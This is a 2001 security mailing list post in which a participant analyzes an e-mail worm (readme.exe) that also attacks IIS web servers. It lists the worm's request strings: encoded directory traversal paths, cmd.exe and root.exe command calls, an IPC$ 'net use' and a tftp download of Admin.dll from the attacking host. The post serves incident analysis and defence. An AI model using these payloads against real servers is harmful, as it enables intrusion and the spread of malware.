-----BEGIN PGP SIGNED MESSAGE----- On Tue, 18 Sep 2001, Cory McIntire wrote: > I and a few others I know are getting bombard on our machines with IIS > requests....looks like another worm, and its much smarter than before, > it seems to stay within the same class A and sometimes the same class B > as the attacking machine is in. here is an excerpt of what i believe is > the full scan.... Here's what I've been able to determine thus far: There is an e-mail worm propagating right now that comes with the payload 'readme.exe'. I suspect this e-mail worm preys on Outlook MUAs, but I have no confirmation of this since the e-mails I've received have been bounces. (Whoever released one iteration of this worm has the "From" address as 'staffat_private'.) This payload does a load of things to assure its propagation. However, it differs from other email-based worms in that it also launches a number of web-based attacks. Namely: /scripts /MSADC /scripts/..%255c.. /_vti_bin/..%255c../..%255c../..%255c.. /_mem_bin/..%255c../..%255c../..%255c.. /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c.. /scripts/..%c1%1c.. /scripts/..%c0%2f.. /scripts/..%c0%af.. /scripts/..%c1%9c.. /scripts/..%%35%63.. /scripts/..%%35c.. /scripts/..%25%35%63.. /scripts/..%252f.. /root.exe?/c+ /winnt/system32/cmd.exe?/c+ net%%20use%%20\\%s\ipc$%%20""%%20/user:"guest" tftp%%20-i%%20%s%%20GET%%20Admin.dll%%20 As can be seen above, it also attempts to make a tftp retrieval for Admin.dll. *sigh* Yet another worm made possible by the insecurity of Microsoft. - -Jay ( ( _______ )) )) .--"There's always time for a good cup of coffee"--. >====<--. C|~~|C|~~| (>------ Jay D. Dyson -- jdysonat_private ------<) | = |-' `--' `--' `-- What doesn't kill us only makes us stronger. --' `------' -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: See http://www.treachery.net/~jdyson/ for current keys. iQCVAwUBO6dk6rlDRyqRQ2a9AQGaKwQAlDjzzfpgW0vqzLIjHj+z4rGJSYf4S8u6 adoqIruHbsmg+UpeeZsvSzmwnGzyKejmhPEo8QqTVtdh3aldssaDgoMLBAU+ryBE 2d38EPCG4Y/mGdd8mmCCYqtZu37oy4ZTmURiG9oOdERFFQ7y3W4IQUE8VifiAOCq di6p4ruu1Ic= =kS6c -----END PGP SIGNATURE----- ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Tue Sep 18 2001 - 10:44:44 PDT